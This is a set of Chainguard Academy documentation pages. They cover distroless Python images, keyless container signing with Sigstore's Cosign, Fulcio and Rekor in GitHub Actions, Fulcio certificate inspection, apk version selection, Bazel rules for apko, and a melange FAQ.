In this tutorial, we've demonstrated how to build a Python image from scratch using the wolfi-base image. We've also shown how to compose a distroless image using a multi-stage build. This technique is useful when you need to reduce the attack surface of your application runtime, which is especially important in security-sensitive environments.

If your application runtime requires system dependencies that are not already included within a distroless variant available in our images directory, you can still use a builder image (identified by the -dev suffix) or the wolfi-base image in a standard Dockerfile to build a suitable runtime. These images come with apk and a shell, allowing for further customization based on your application's requirements.
If you can’t find an image that is a good match for your use case, or if your build has dependencies that cannot be met with the regular catalog, get in touch with us for alternative options. --- ### How to Keyless Sign a Container Image with Sigstore URL: https://edu.chainguard.dev/open-source/sigstore/how-to-keyless-sign-a-container-with-sigstore/ Last Modified: August 24, 2022 Tags: Cosign, Sigstore, Procedural An earlier version of this material was published in the lab in chapter 5 of the Linux Foundation Sigstore course. This tutorial will bring some of the components of Sigstore together in an example project. In this demonstration, we’ll be using GitHub Actions to perform keyless signing on a sample container. In this example, we’ll use a Django container that displays a generic “Hello, World” style landing page. Django is a Python web framework. Prerequisites You should have the following in place before continuing: The latest version of Docker and Docker Compose installed, and an account on Docker Hub. At the time of writing (June 2022), Docker Engine should be version 20.10 and Docker Compose should be version 2.6. If you are on macOS, you will need to use Docker Desktop; refer to the official documentation for your operating system to ensure that your system meets the necessary requirements. Docker Desktop should be version 4.8 or higher. Cosign installed, follow How to Install Cosign. The Rekor CLI installed, follow the installation guide Familiarity with Git, GitHub, and GitHub Actions is helpful, but we’ll provide some context and also walk you through setting up a GitHub account. With these prerequisites in place, let’s begin. Sign up for GitHub To create a GitHub account, navigate to https://github.com/join and fill in a valid username, email address, and password. For a username, you may want to think about whether you want a name that represents your name, or a more anonymous one. You may want to click off the email marketing box. You should also verify your account. GitHub provides additional documentation on signing up for an account. You’ll be using a free personal account to work with GitHub. If you are not familiar with Git and GitHub, you can review the official GitHub official docs on About Git. We will walk you through the relevant commands in this section. GitHub Actions can perform CI/CD on your repository. You can learn more about GitHub Actions through the official GitHub docs. We will walk you through the relevant files here. Create a GitHub Repository When you are logged into GitHub, create a new repository by clicking on the + button in the upper right-hand corner of the page (next to your user icon). The menu will drop down and you can select New repository. On the Create a new repository page, you can create a repository, you can leave the defaults, but write a meaningful name for the Repository name field, such as django-keyless-signing. Note that you’ll need to keep the repository public so that the signed image you build will be able to be uploaded to Rekor’s public transparency log. Create a Local Directory for the Repository Now, you’ll need to create a local directory for this repository. For our example, we’ll want our path to be ~/Documents/GitHub/django-keyless-signing, but you can choose an alternate path. Create the GitHub directory if necessary, and then navigate into that folder. cd ~/Documents/GitHub Within the GitHub folder, create the new directory for your repository, and move into it. 
mkdir django-keyless-signing && cd $_

You’ll be making a few files in this directory that you’ll then push up to the GitHub repository.

Create Django Container Files

First, create a requirements.txt file for your Django container. This is a common file in Python projects that is used to install the necessary dependencies at the right versions. The Django Docker container will pull from this file to set up the image. You need the Django package and Psycopg, which is a PostgreSQL database adapter for Python. Create your file with a text editor like nano.

nano requirements.txt

Once the file is open, write the following into it to set and pin your dependencies.

Django>=3.0,<4.0
psycopg2>=2.8

Save and close the file. Next, create your Dockerfile, again with a text editor like nano.

nano Dockerfile

Within this file you will set up the version of Python, the environment, and tell the container to install the dependencies in requirements.txt.

# syntax=docker/dockerfile:1
FROM python:3
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
WORKDIR /code
COPY requirements.txt /code/
RUN pip install -r requirements.txt
COPY . /code/

Once you are satisfied that your Dockerfile reflects the content above, you can save and close the file.

Finally, you’ll create a docker-compose.yml file. This file allows you to document and configure all of your application’s service dependencies. If you would like to read more about Docker Compose, please refer to the official Docker documentation. Again, use nano or a similar text editor to create your file.

nano docker-compose.yml

You can add the following contents to this file. This sets up the environment and Postgres database, and builds the web server on port 8000 of the present machine.

version: "3.9"

services:
  db:
    image: postgres
    volumes:
      - ./data/db:/var/lib/postgresql/data
    environment:
      - POSTGRES_DB=postgres
      - POSTGRES_USER=postgres
      - POSTGRES_PASSWORD=postgres
  web:
    build: .
    command: python manage.py runserver 0.0.0.0:8000
    volumes:
      - .:/code
    ports:
      - "8000:8000"
    environment:
      - POSTGRES_NAME=postgres
      - POSTGRES_USER=postgres
      - POSTGRES_PASSWORD=postgres
    depends_on:
      - db

At this point, your Django container is set up. You can run the tree command to review the file structure. Note that tree may not come installed on your machine; use your package manager to install it if you would like to run this optional command.

tree

.
├── Dockerfile
├── docker-compose.yml
└── requirements.txt

0 directories, 3 files

If your output matches the output above, you are all set to continue.

Steps to Automate Keyless Signing

We next create a GitHub Actions YAML file. There is some boilerplate in this file common to GitHub Actions, but the high-level overview is that we need to enable OIDC, install Cosign, build and push the container image, and then sign the container image. We’ll discuss each of these steps here, and then write the entire file in the next section.

After a cron job that schedules the Action, your first step will be to enable GitHub Actions OIDC tokens. Fulcio is a free root certificate authority that issues certificates based on an OIDC email address. This is essentially enabling the certificate step of our action. The key piece here is id-token: write, which you will have under build and under jobs in your Actions workflow.
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write
      id-token: write

The rest of this build is telling us that the container is running on the latest version of Ubuntu, that the contents are to be read, and the packages are to be written. The id-token: write line enables our job to create tokens as this workflow. This permission may only be granted to workflows on the main repository, so it cannot be granted during pull request workflows. You can learn more about GitHub Actions’ OIDC support from their document on “Security hardening your deployments.”

The next major part of this YAML file is installing Cosign.

- name: Install cosign
  uses: sigstore/cosign-installer@main

Cosign is available through the GitHub Action Marketplace, which is why we can add it to our GitHub Action as above. You can pin your workflow to a particular release of Cosign. For example, here you will use version 2.1.1.

- name: Install cosign
  uses: sigstore/cosign-installer@main
  with:
    cosign-release: 'v2.1.1'

After this step, there will be some actions to set up the Docker build, log into the GitHub Container Registry, and build and push the container image. The next piece that is most relevant to our work with Sigstore is signing the container image.

- name: Sign the container image
  run: cosign sign --yes ghcr.io/${{ github.repository }}@${{ steps.push-step.outputs.digest }}

Here you’ll run the cosign sign command on the container we are pushing to the GitHub Container Registry, with the relevant variables calling our repository and digest. Because we are using a public repository, the signature will automatically be pushed to the public instance of the Rekor transparency log.

Now that you understand the main pieces of the YAML file, let’s create it and review the contents of the entire file.

Create GitHub Actions File

You’ll next create a hidden directory called .github and a subdirectory called workflows. Ensure that you are in your django-keyless-signing directory and create these two directories.

mkdir .github && cd $_
mkdir workflows && cd $_

Within this directory, you’ll be creating a YAML file to run a GitHub Action Workflow.

nano docker-publish.yml

This is how we will be building, publishing, and signing the container. We will start by naming it Publish and Sign Container Image, then set up a scheduled cron job so it runs regularly, as well as whenever there is a push to the main branch or a pull request is merged into the main branch. The rest of the file will follow what we discussed in the previous section.

name: Publish and Sign Container Image

on:
  schedule:
    - cron: '32 11 * * *'
  push:
    branches: [ main ]
    # Publish semver tags as releases.
    tags: [ 'v*.*.*' ]
  pull_request:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write
      id-token: write

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Install cosign
        uses: sigstore/cosign-installer@main
        with:
          cosign-release: 'v2.1.1'

      - name: Setup Docker buildx
        uses: docker/setup-buildx-action@v2

      - name: Log into ghcr.io
        uses: docker/login-action@master
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}

      - name: Build and push container image
        id: push-step
        uses: docker/build-push-action@master
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:latest

      - name: Sign the container image
        run: cosign sign --yes ghcr.io/${{ github.repository }}@${{ steps.push-step.outputs.digest }}

Now, your demo Django container project is complete and ready for GitHub Actions to run on it. Verify that your project is configured correctly. Run the tree command with the -a flag from your project’s root directory to view invisible directories.

cd ~/Documents/GitHub/django-keyless-signing
tree -a

.
├── .github
│   └── workflows
│       └── docker-publish.yml
├── Dockerfile
├── docker-compose.yml
└── requirements.txt

2 directories, 4 files

If your setup matches, we can proceed.

Generate GitHub Personal Access Token

In order to use GitHub on the command line and run GitHub Actions, you’ll need a personal access token. In your web browser, navigate to https://github.com/settings/tokens in order to set those up. You’ll click on the Generate new token button and fill out the form on the next page. Fill in the Note field to describe what the token is for; the 30 days expiration is adequate. You’ll need to select the repo, workflow, and write:packages scopes, as indicated in the screenshot below.

With this filled out, you can click on the green Generate token button at the bottom of the page and then your token will display on the page. Be sure to copy this token; you won’t have access to it again. You’ll be using this token to authenticate on the command line.

Initialize Git Repository and Push Changes

From your local django-keyless-signing repository, initialize the repository for use with Git.

git init

Next, you will add the files you created to the Git stage.

git add .github Dockerfile docker-compose.yml requirements.txt

At this point, you can check that your Git stage is all set for committing and then pushing your changes to the remote GitHub repository.

git status

On branch main

No commits yet

Changes to be committed:
  (use "git rm --cached <file>..." to unstage)
	new file:   .github/workflows/docker-publish.yml
	new file:   Dockerfile
	new file:   docker-compose.yml
	new file:   requirements.txt

The output indicates that changes are ready to be committed. You will now commit with a message, as in the next command.

git commit -m "first commit"

[main (root-commit) 301800b] first commit
 4 files changed, 93 insertions(+)
 create mode 100644 .github/workflows/docker-publish.yml
 create mode 100644 Dockerfile
 create mode 100644 docker-compose.yml
 create mode 100644 requirements.txt

Now, set the name of the default branch to main.

git branch -M main

So far we have not connected to the remote repository. You should add that repository now. This will be the URL for your repository plus .git at the end. Ensure that you replace github-username with your actual username on GitHub.
git remote add origin https://github.com/github-username/django-keyless-signing.git

With this set up, you’ll be able to push your changes to the remote repository that’s hosted on GitHub.

git push -u origin main

With this command, you will be prompted to enter your GitHub username and the GitHub personal access token. In the first prompt, enter your GitHub username, where it reads Username. In the second prompt, where it reads Password, enter your personal access token, not your GitHub password.

Username for 'https://github.com':
Password for 'https://github-username@github.com':

Once you enter these, you’ll receive output indicating that your changes were pushed to the remote repository.

Enumerating objects: 8, done.
Counting objects: 100% (8/8), done.
Delta compression using up to 10 threads
Compressing objects: 100% (5/5), done.
Writing objects: 100% (8/8), 1.62 KiB | 1.62 MiB/s, done.
Total 8 (delta 0), reused 0 (delta 0), pack-reused 0
To https://github.com/github-username/django-keyless-signing.git
 * [new branch]      main -> main
branch 'main' set up to track 'origin/main'.

With this complete, you can navigate to the URL of your GitHub repository.

Confirm Keyless Signing via GitHub Actions

With your repository set up, you can move to the Actions tab of your GitHub repository. Here, you’ll be able to inspect the workflows that have run. Since there is only one workflow in this repo, you can inspect the one for first commit. Here, a green checkmark and build will be displayed on the page under docker-publish.yml. This action ran when you pushed your code into the repository.

You can click on build and inspect the steps of the action. Your page will appear similar to the following. Ensure that your action ran and that your output is similar. From here, you can click into each step of the build process and drill down further. Click into Sign the container image. This will drop down and provide you with more information, like so.

Run cosign sign --yes ghcr.io/github-username/django-keyless-signing@sha256:a53e24bd4ab87ac4764fb8736dd76f388fd2672c1d372446c9a2863e977f6e54
Generating ephemeral keys...
Retrieving signed certificate...
client.go:196: root pinning is not supported in Spec 1.0.19
Successfully verified SCT...
tlog entry created with index: XXXXXXX
Pushing signature to: ghcr.io/github-username/django-keyless-signing

This provides a bit of information, including the SHA, the Rekor log index number (as indicated by tlog entry created with index), and the URL of the container that the signature was pushed to. You can also inspect the image itself under Packages on the main page of your repository. If you would like, you can pull down the Docker image. This is not necessary for our next step, where we will check that the image was signed and that the signature is in the Rekor transparency log.

Verify Signatures

With your container signed by Cosign keyless signing in GitHub Actions, you next need to verify that everything worked as expected: that the container is indeed signed, and that an entry for that signature was generated in Rekor. You can do that by using the cosign verify command against the published container image.

cosign verify ghcr.io/github-username/django-keyless-signing \
  --certificate-identity https://github.com/github-username/django-keyless-signing/.github/workflows/docker-publish.yml@refs/heads/main \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com | jq

Your output should be similar to the following, though note that the strings are abbreviated.
Verification for ghcr.io/github-username/django-keyless-signing:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - Any certificates were verified against the Fulcio roots. [ { "critical": { "identity": { "docker-reference": "ghcr.io/github-username/django-keyless-signing" }, "image": { "docker-manifest-digest": "sha256:a4aa08ce4593" }, "type": "cosign container image signature" }, "optional": { "Bundle": { "SignedEntryTimestamp": "8XFlAArYeA", "Payload": { "body": "E5ha0V5VFVSTmVFNXFSWGROUkZwaFJuY3dlVTFxUVRKTlJFMTRUbXBKZDAxRVZtRk5", "integratedTime": 1654272608, "logIndex": XXXXXXX, "logID": "a4aa08ce4593" } }, "Issuer": "https://token.actions.githubusercontent.com", "Subject": "https://github.com/github-username/django-keyless-signing/.github/workflows/docker-publish.yml@refs/heads/main" } } ] You can also review the log on Rekor by using the logIndex as above, which matches the tlog entry created with index you found in the output from the GitHub Actions. You can use either verify or get with the Rekor CLI. In the first case, your command will be formatted like so and provide a lot of output with a full inclusion proof. Note that this output is abbreviated. Substitute the Xs in the command for your log index number. rekor-cli verify --rekor_server https://rekor.sigstore.dev --log-index XXXXXX Current Root Hash: 1ce1a05f2ec146e503d78649c093 Entry Hash: e739fb04525a9e8a0d590b9f944714ce469c Entry Index: XXXXXX Current Tree Size: 2251200 Inclusion Proof: SHA256(0x01 | 3742364ed095572728c5c4c6abcc55cda3111833bb01260b6dfd50ce0214bbfe | b0f3127874d6ce2ca520797f4ab9e739fb04525a9e8a0d590b9f944714ce469c) = b94433c839343e37b42cdf2281731571971202c77defdae51a6c386a4d1bfb7b … SHA256(0x01 | efb36cfc54705d8cd921a621a9389ffa03956b15d68bfabadac2b4853852079b | 5a35a58d7624edfb9adf6ea9f0cbed558f5e5d45ca91acb5243757d72f1b2454) = 2c0c0e511e071ab024da0ebd89f67b39ae7a1ce1a05f2ec146e503d78649c093 In the second instance, you’ll receive JSON formatted output. Note the output here is abbreviated. Substitute the Xs in the command for your log index number. rekor-cli get --rekor_server https://rekor.sigstore.dev --log-index XXXXXX LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: XXXXXXX IntegratedTime: 2022-06-03T17:12:38Z UUID: 0d590bf944714ce469c Body: { "HashedRekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "abb1bef9a31c634cfc" } }, "signature": { "content": "RxAva1EnlCS5AIhAN", "publicKey": { "content": "jeTlvWldGa2N5OXRZV2x1TUM0fNpc0dBUVFCZzc4d0FRUUVJRkIxWW14cGMyZ2cKWVc1" } } } } Congratulations! You have signed a container with Cosign through GitHub Actions by using OIDC through Fulcio, and can verify this on the Rekor log. --- ### How to Generate a Fulcio Certificate URL: https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-generate-a-fulcio-certificate/ Last Modified: August 19, 2022 Tags: Fulcio, Procedural An earlier version of this material was published in the Fulcio chapter of the Linux Foundation Sigstore course. In this tutorial, we are going to create and examine a Fulcio certificate to demonstrate how Fulcio can work in practice. To follow along, you will need Cosign installed on your local system. If you haven’t installed Cosign yet, you can follow the instructions described in How to Install Cosign, or you can follow one of the installation methods described in the official documentation. 
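Before moving on, you may want to confirm that your Cosign installation is working. Running the following command (assuming Cosign is on your PATH) prints the installed release; the exact output will vary depending on the version you installed.

cosign version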
Please note that using Cosign requires Go v1.16 or higher. The Go Project provides official download instructions.

To get started, place some text in a text file. For instance:

echo "test file contents" > test-file.txt

Next, let’s generate a key pair with Cosign:

cosign generate-key-pair

Enter and confirm a password after running this command.

Then, use Cosign to sign this test-file.txt, outputting a Fulcio certificate named “fulcio.crt.base64”. The sign-blob subcommand allows Cosign to sign a blob. This command will open a browser tab and will require you to sign in through one of the OIDC providers: GitHub, Google, or Microsoft. This step represents the user proving their identity.

cosign sign-blob test-file.txt --output-certificate fulcio.crt.base64 --output-signature fulcio.sig

After authentication, you can close the browser tab. In your terminal, you will receive output similar to this:

Using payload from: test-file.txt
Generating ephemeral keys...
Retrieving signed certificate...

Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later.

By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs.
Are you sure you would like to continue? [y/N] y

If you agree, enter y and continue. You will receive output like this:

Your browser will now be opened to:
https://oauth2.sigstore.dev/auth/auth?access_type=online&client_id=sigstore&code_challenge=…
Successfully verified SCT...
using ephemeral certificate:
-----BEGIN CERTIFICATE-----
(…)
-----END CERTIFICATE-----
tlog entry created with index: 2494952
Signature wrote in the file fulcio.sig
using ephemeral certificate:
-----BEGIN CERTIFICATE-----
(…)
-----END CERTIFICATE-----
Certificate wrote in the file fulcio.crt.base64

The output indicates that Sigstore is using ephemeral keys to generate a certificate for `test-file.txt`. The certificate, which we'll verify in the next section, is saved to a file named `fulcio.crt.base64`.
If you don’t have a certificate ready to inspect, you can generate one by following How to Generate a Fulcio Certificate.

base64 -d < fulcio.crt.base64 > fulcio.crt

Then, inspect the certificate using step’s inspect command.

step certificate inspect fulcio.crt

A sample output is below. Pay special attention to the X509v3 Subject Alternative Name field, which contains the email address associated with the party that created the signature, and to the issuer, which is Sigstore. The ten-minute validity window also details the period of time for which the certificate is valid.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 445971695346061852979091305347141417164194935 (0x13ff8105719cba6ad0caa5ce9f34603ce9c477)
    Signature Algorithm: ECDSA-SHA384
        Issuer: O=Sigstore.dev,CN=sigstore
        Validity
            Not Before: Mar 24 20:14:37 2022 UTC
            Not After : Mar 24 20:24:36 2022 UTC
        Subject:
        Subject Public Key Info:
            Public Key Algorithm: ECDSA
                Public-Key: (256 bit)
                X:
                    4b:fc:7d:9c:4a:56:30:75:67:fd:d6:1f:a6:f3:05:
                    04:ff:c8:ad:c6:2c:5f:ea:59:f9:ed:07:fa:c2:ae:
                    04:19
                Y:
                    15:44:38:f3:77:87:63:91:0c:08:b6:4f:ca:67:36:
                    3f:38:dc:fc:bc:07:5c:8f:ec:d3:b2:31:66:a8:3d:
                    fa:98
                Curve: P-256
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature
            X509v3 Extended Key Usage:
                Code Signing
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Key Identifier:
                5A:F0:DE:DA:CF:D0:73:F1:5A:88:B2:9F:8E:03:5F:51:6E:8C:57:19
            X509v3 Authority Key Identifier:
                keyid:58:C0:1E:5F:91:45:A5:66:A9:7A:CC:90:A1:93:22:D0:2A:C5:C5:FA
            X509v3 Subject Alternative Name: critical
                email:email@example.com
            1.3.6.1.4.1.57264.1.1:
                https://github.com/login/oauth
    Signature Algorithm: ECDSA-SHA384
         30:65:02:31:00:98:00:17:7a:98:f2:d4:89:05:d2:7a:91:93:
         73:92:e6:3f:9d:69:a5:7c:28:9f:60:72:29:e3:b7:d3:5e:2f:
         1a:00:35:99:4f:92:da:02:cd:ec:83:49:f3:27:3a:39:21:02:
         30:04:a6:0c:42:a4:38:d9:ac:da:8f:b5:2f:4c:f5:ad:4b:d4:
         c6:7d:8b:43:46:91:c1:9d:80:43:44:a9:26:26:26:0f:cf:e2:
         ab:aa:ef:6d:ec:1c:28:df:d3:ac:aa:fd:1b

We will then verify the certificate against the Fulcio certificate authority root, by using step certificate verify to execute the certificate path validation algorithm for x.509 certificates.

step certificate verify fulcio.crt --roots ~/.sigstore/root/targets/fulcio_intermediate_v1.crt.pem

The final command checks the signature in the fulcio.sig file, tracing the certificate up to the Fulcio root certificate. You’ll need to use the identity flags --certificate-identity, which corresponds to the email address of the signer, and --certificate-oidc-issuer, which corresponds to the OIDC provider that the signer used. For example, a signature created with a Gmail account using Google as the OIDC issuer can be verified with the following command:

cosign verify-blob test-file.txt \
  --signature fulcio.sig \
  --cert fulcio.crt.base64 \
  --certificate-identity username@gmail.com \
  --certificate-oidc-issuer https://accounts.google.com

You should receive a Verified OK message if the signature, certificate, and identities match.

---

### Package Version Selection

URL: https://edu.chainguard.dev/open-source/wolfi/apk-version-selection/ Last Modified: November 6, 2023 Tags: Chainguard Containers, Wolfi, apk, melange

This document explains how to specify version constraints for packages installed with the apk tool, as well as apko and melange.
Understanding version selection will enable you to choose the version you’re looking for, determine what updates and vulnerability fixes you receive, and allow you to reproduce an image’s digest through exact version matching.

Version selection in apko and melange

All the examples in this document focus on usage with the apk tool, but the same semantics apply to apk add as well as references in an apko or melange packages field:

environment:
  packages:
    - go>1.21     # install anything newer than 1.21, excluding 1.21
    - foo=~4.5.6  # install any version with a name starting with "4.5.6" (e.g., 4.5.6-r7)
    - python3     # install the latest stable version of python3.

Basic Usage

apk add go

This will install the latest stable version of Go. This is nearly always what you want, since it gives you stable software, with as many updates and vulnerability fixes as possible. See below for information on the behavior of pre-release versions.

Fuzzy Matching

You can also use fuzzy version matching. For example, if you don’t care about the epoch, you can request any version of Go with a version string starting in 1.21.1:

apk add go=~1.21.1

Or you can add any 1.21:

apk add go=~1.21

If multiple versions match that prefix (e.g., 1.21.1-r0, 1.21.1-r1, etc.), then the highest numbered next version segment will be chosen. Fuzzy matching means you can request Go 1.21 without getting 1.20 or 1.22, like you would with < or >.

Wolfi provides a separate go-1.21 package that has provides: go=1.21.x, so in Go’s case you can request go-1.21 and get the same behavior as go~1.21. But this might not be the case for all packages.

The operators ~, ~= and =~ are equivalent, and all do the same thing.

You can also use fuzzy matching to request a major version prefix:

apk add go=~1

Go will not have a version 2, but other packages might. For example, erlang=~26 will match any release of Erlang in the 26 major version, and not match Erlang 25 and below or 27 and above. erlang~2 will not match Erlang 26 or 27. It only fuzzy matches whole segments of a semantic versioning version string.

Version Constraints

To request a minimum or maximum acceptable version of a package to install, you can use >, <, >= and <=:

apk add go>1.20   # install anything newer than 1.20, excluding 1.20.0, but including 1.20.1
apk add go<1.20   # install anything older than 1.20, excluding 1.20.0, but including 1.19.14
apk add go>=1.20  # install anything newer than 1.20, including 1.20.0
apk add go<=1.20  # install anything older than 1.20, including 1.20.0

This comparison logic is aware of semantic versioning semantics, so 1.9.10 is less than 1.10, and 1.9.9 is less than 1.9.10, even though they may be alphabetically sorted later. Version constraints can be useful when you want to ensure a minimum or maximum major or minor version, but still want to receive minor or patch updates. Fuzzy matching can produce the same behavior – go~1.20 is equivalent to go>=1.20 for example.

Installing Future Versions

Using apk add go installs the latest stable release of Go. For most packages, there is no distinction between the “latest” and “latest stable” release. Some projects, like Go, Node, Python, etc., produce pre-release versions before a stable release, or have more nuanced release maturity and support processes. Please refer to the respective larger project for more information.

Go versions often have Release Candidates. For example, when Go 1.21 is the latest release, the Go team may prepare for Go 1.22 by releasing a Go 1.22_rc1 to let folks try it out before it’s fully released.
To install this version, you can specify the pre-release package name, which for go will be go-1.22: apk add go-1.22 Note that this string uses a dash (-), which means it’s specifying the full name of the package, which Wolfi’s convention is go-1.22. Since it doesn’t include any other version constraint or fuzzy matching, it’s requesting “the latest version of a package named go-1.22”, which may install go-1.22 with version 1.22_rc3. When Go 1.22 is fully released, it will become the latest release of Go and provides:[go=$version], so apk add go will install Go 1.22.0. Exact Version Matching You can also specify an exact version and epoch to install: apk add go=1.21.1-r0 This will install exactly this version and epoch, as long as that is available. Because package updates or vulnerability fixes won’t be picked up, this is not generally useful for day-to-day usage. However, this is useful for reproducing an environment exactly, and it’s the form we use in the resolved apko configuration attestation we attach to images. This makes it clear exactly what versions of which packages were installed in an image, so you can reproduce it with apko to get exactly the same image digest. --- ### Bazel Rules for apko URL: https://edu.chainguard.dev/open-source/build-tools/apko/bazel-rules/ Last Modified: May 2, 2024 Tags: apko, Procedural rules_apko is an open source plugin for Bazel that makes it possible to build secure, minimal Wolfi-based container images using the popular Bazel build system. This wraps the apko tool for use under Bazel. Prerequisites First, be sure you have Bazel installed, you can follow the Bazel installation guide for more details. Next, rules_apko requires a one-time setup to configure Bazel to be able to make partial fetches. Paste the following into your root BUILD file. load("@rules_apko//apko:defs.bzl", "apko_bazelrc") apko_bazelrc() Note: By default, apko_bazelrc will generate .bazelrc to accommodate for fetching from dl-cdn.alpinelinux.org and packages.wolfi.dev. this can be configured by passing the repositories attribute to apko_bazelrc() call. Then, run the following command. bazel run @@//:apko_bazelrc && chmod +x .apko/range.sh Finally, paste this into your preferred `.bazelrc` file, # Required for rules_apko to make range requests try-import %workspace%/.apko/.bazelrc Review additional initial setup documentation updates in the rules_apko repo. Installation To install v1.0.0, you can follow one of the options below. For other releases, follow the instructions in the release notes from the release you wish to use: https://github.com/chainguard-dev/rules_apko/releases. Using Bzlmod with Bazel 6 Enable with common --enable_bzlmod in .bazelrc. Add to your MODULE.bazel file: bazel_dep(name = "rules_apko", version = "1.0.0-rc1") Using WORKSPACE Paste this snippet into your file: load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") http_archive( name = "rules_apko", sha256 = "5c91a2322bec84a0005dd8178495775938b581053812e70d21b030bef3625623", strip_prefix = "rules_apko-1.0.0-rc1", url = "https://github.com/chainguard-dev/rules_apko/releases/download/v1.0.0-rc1/rules_apko-v1.0.0-rc1.tar.gz", ) ###################### # rules_apko setup # ###################### # Fetches the rules_apko dependencies. # If you want to have a different version of some dependency, # you should fetch it *before* calling this. # Alternatively, you can skip calling this function, so long as you've # already fetched all the dependencies. 
load("@rules_apko//apko:repositories.bzl", "apko_register_toolchains", "rules_apko_dependencies") rules_apko_dependencies() apko_register_toolchains(name = "apko") load("@rules_apko//apko:translate_lock.bzl", "translate_apko_lock") translate_apko_lock( name = "example_lock", lock = "@//:apko.lock.json", ) load("@example_lock//:repositories.bzl", "apko_repositories") apko_repositories() Rules Public API re-exports apko_image apko_image(name, architecture, args, config, contents, output, tag) Build OCI images from APK packages directly without Dockerfile. This rule creates Alpine images using the apko.yaml configuration file and relies on cache contents generated by translate_lock to be fast. apko_image( name = "example", config = "apko.yaml", contents = "@example_lock//:contents", tag = "example:latest", ) The label @example_lock//:contents is generated by the translate_lock extension, which consumes an ‘apko.lock.json’ file. For more details, refer to the apko cache documentation. An example demonstrating usage with rules_oci: apko_image( name = "alpine_base", config = "apko.yaml", contents = "@alpine_base_lock//:contents", tag = "alpine_base:latest", ) oci_image( name = "app", base = ":alpine_base" ) For more examples checkout the examples directory. Attributes Name Description Type Mandatory Default name A unique name for this target. Name required architecture the CPU architecture which this image should be built to run on. See https://github.com/chainguard-dev/apko/blob/main/docs/apko_file.md#archs-top-level-element String optional "" args additional arguments to provide when running the apko build command. List of strings optional [] config Label to the apko.yaml file. Label required contents Label to the contents repository generated by translate_lock. See apko-cache documentation. Label required output - String optional “oci” tag tag to apply to the resulting docker tarball. only applicable when output is docker String required apko_bazelrc apko_bazelrc(name, repositories, kwargs) Helper macro for generating .bazelrc and range.sh files to allow for partial package fetches. Review Prerequisites documentation for more information. Parameters Name Description Default Value name name of the target “apko_bazelrc” repositories list of repositories to generate .bazelrc for [“dl-cdn.alpinelinux.org”, “packages.wolfi.dev”] kwargs passed to expanding targets. only well known attributes such as tags testonly ought to be present. none Fetching and Caching Contents To ensure efficient operation, the apko_image rule must maintain a cache of remote contents that it fetches from repositories. While outside of Bazel, apko manages its own cache, under Bazel, the cache must be maintained by Bazel to ensure correctness and speed. Therefore, Bazel needs to know what needs to be fetched and from where to cache these HTTP requests and provide them to apko as required. The apko.lock.json file contains all the necessary information about how to perform the HTTP fetches required by apko to build the container image. Generating the Lock File Note: Documentation for lockfile generation will be added to the repository docs once the apko resolve command is available. Using translate_lock Having just the apko.lock.json file alone is insufficient; all the information needs to be converted into apk_<content_type> repository calls to make them accessible to Bazel. The translate_lock tool accomplishes this by taking the apko.lock.json file and dynamically generating the required Bazel repositories. 
translate_lock will create a new bazel repository named after itself. This repository will also have a target named contents, which you can pass to apko_image: apko_image( name = "lock", config = "apko.yaml", # name of the repository is the same translate_lock! contents = "@examples_lock//:contents", tag = "lock:latest", ) Usage with bzlmod apk = use_extension("//apko:extensions.bzl", "apko") apk.translate_lock( name = "examples_lock", lock = "//path/to/lock:apko.lock.json", ) use_repo(apk, "examples_lock") Usage with Workspace load("@rules_apko//apko:translate_lock.bzl", "translate_apko_lock") translate_apko_lock( name = "example_lock", lock = "//path/to/lock:apko.lock.json", ) load("@example_lock//:repositories.bzl", "apko_repositories") apko_repositories() Repository rules for translating apko.lock.json translate_apko_lock translate_apko_lock(name, lock, repo_mapping, target_name) Repository rule to generate starlark code from an apko.lock.json file. Review the section above for more information. Attributes Name Description Type Mandatory Default name A unique name for this repository. Name required lock label to the apko.lock.json file. Label required repo_mapping A dictionary from local repository name to global repository name. This allows controls over workspace dependency resolution for dependencies of this repository.<p>For example, an entry "@foo": “@bar” declares that, for any time this repository depends on @foo (such as a dependency on @foo//some:target, it should actually resolve that dependency within globally-declared @bar (@bar//some:target). Dictionary: String -> String required target_name internal. do not use! String optional "" --- ### melange FAQs URL: https://edu.chainguard.dev/open-source/build-tools/melange/faq/ Last Modified: August 1, 2024 Tags: melange, FAQ Do I need to understand melange to use Chainguard Containers? No. Chainguard built melange as part of its open source tooling used for the Wolfi operating system. While you can check out the project on GitHub and learn more, it’s not a prerequisite for using or working with Chainguard Containers. How are melange packages defined? melange apks are defined declaratively using a YAML file. Is melange compatible with Alpine? Yes, melange is built to be compatible with apk-based systems including Alpine. Can I mix Alpine and Wolfi package repositories to create my melange build environment? No, it’s not possible to mix Alpine apks with Wolfi apks. Is it mandatory to sign packages with a melange key? Signing packages is not mandatory, but it is a recommended practice, because it allows users and automated systems to verify that the package they downloaded was built by the same person who signed it, and that it hasn’t been tampered with. What happens if I don’t provide a key to sign my package(s)? Some systems may prevent installation of your apk if they can’t attest the package provenance. This is the case with apko, which by default will fail any builds that reference unsigned packages. Can I create custom pipelines and embed them into my main pipeline? Although melange supports inclusion of sub-pipelines, this feature currently only supports the built-in pipelines (such as make, split and others) that can be found at the pkg/build/pipelines directory on the main project repository. 
